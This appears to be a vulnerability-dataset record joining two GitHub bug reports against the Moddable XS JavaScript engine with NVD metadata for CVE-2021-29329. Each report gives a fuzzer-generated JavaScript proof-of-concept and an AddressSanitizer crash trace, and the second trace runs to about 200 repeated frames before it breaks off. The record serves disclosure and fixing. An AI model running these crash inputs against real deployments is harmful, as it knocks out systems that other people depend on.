# Enviroment ``` operating system: ubuntu18.04 compile command: cd /pathto/moddable/xs/makefiles/lin make test command: ./xst poc ``` # poc: ``` function getHiddenValue() { var obj = {}; var nEmw = new RegExp(null); var oob = 'value'; var fun = eval(str); nEmw = new Object(); oob = Object.assign('0', Object(521)); var str = 'new String(\'\')'; var fun = eval(str); let protoWithIndexedAccessors = {}; var j = []; Object.assign(obj, fun); var fun = eval(str); return obj; } function makeOobString() { var hiddenValue = getHiddenValue(); var str = 'constructor'; var extern_arr_vars = []; let i = 0; var ijjkkk = 0; str = ijjkkk < 100000; function helper(i) { let a = new Array(); var extern_arr_vars = []; if (ijjkkk < 100000) { makeOobString(a, protoWithIndexedAccessors); } return a; var oobString = makeOobString(); } var j = []; var fun = eval(str); Object(fun, hiddenValue); var oobString = helper(); for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) { fun = makeOobString(); } return oobString; } var oobString = makeOobString(); var oobString = makeOobString(); helper(oobString); let protoWithIndexedAccessors = {}; ``` # description ``` ASAN:SIGSEGV ================================================================= ==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0) #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251 #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147 #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133 #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708 #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369 #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270 #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow ==5974==ABORTING ```
over access(fxEnvironmentGetProperty)
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/585/comments
0
2021-02-26T10:32:47Z
2021-03-23T22:52:57Z
https://github.com/Moddable-OpenSource/moddable/issues/585
817,238,338
585
2,798
CVE-2021-29329
2021-11-19T17:15:08.293
OpenSource Moddable v10.5.0 was discovered to contain a stack overflow in the fxBinaryExpressionNodeDistribute function at /moddable/xs/sources/xsTree.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/587" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/587" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/Moddable-OpenSource/moddable/issues/587
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: cd /pathto/moddable/xs/makefiles/lin make test command: ./xst poc ``` # poc: ``` function getHiddenValue() { var obj = {}; var oob = '/re/'; oob = oob.replace('', '-0'.repeat(1048576)); var str = '(new Number(-0))' + oob + '(new Boolean(false))'; var fun = eval(str); Object.assign(obj, fun); return obj; } function makeOobString() { var hiddenValue = getHiddenValue(); var str = '-Infinity'; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var oobString = makeOobString(); ``` # description ``` ASAN:SIGSEGV ================================================================= ==6025==ERROR: AddressSanitizer: stack-overflow on address 0x7fff6d476ff8 (pc 0x000000646053 bp 0x7fff6d477020 sp 0x7fff6d476ff0 T0) #0 0x646052 in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:265 #1 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #2 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #3 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #4 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #5 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #6 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #7 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #8 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #9 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #10 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #11 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #12 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #13 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #14 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #15 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #16 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #17 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #18 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #19 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #20 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #21 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #22 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #23 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #24 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #25 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #26 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #27 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #28 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #29 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #30 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #31 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #32 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #33 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #34 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #35 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #36 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #37 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #38 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #39 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #40 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #41 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #42 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #43 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #44 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #45 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #46 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #47 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #48 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #49 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #50 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #51 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #52 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #53 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #54 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #55 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #56 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #57 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #58 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #59 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #60 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #61 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #62 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #63 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #64 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #65 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #66 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #67 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #68 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #69 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #70 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #71 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #72 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #73 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #74 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #75 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #76 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #77 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #78 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #79 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #80 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #81 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #82 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #83 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #84 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #85 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #86 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #87 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #88 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #89 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #90 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #91 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #92 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #93 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #94 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #95 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #96 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #97 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #98 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #99 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #100 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #101 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #102 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #103 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #104 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #105 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #106 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #107 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #108 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #109 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #110 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #111 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #112 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #113 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #114 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #115 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #116 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #117 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #118 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #119 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #120 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #121 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #122 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #123 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #124 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #125 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #126 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #127 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #128 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #129 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #130 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #131 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #132 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #133 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #134 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #135 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #136 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #137 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #138 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #139 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #140 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #141 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #142 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #143 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #144 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #145 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #146 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #147 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #148 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #149 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #150 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #151 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #152 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #153 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #154 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #155 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #156 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #157 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #158 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #159 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #160 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #161 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #162 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #163 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #164 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #165 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #166 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #167 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #168 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #169 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #170 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #171 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #172 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #173 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #174 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #175 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #176 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #177 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #178 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #179 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #180 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #181 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #182 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #183 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #184 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #185 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #186 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #187 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #188 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #189 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #190 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #191 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #192 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #193 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #194 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #195 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #196 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #197 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #198 0x64609b in fxBinaryExpressionNodeDistribute 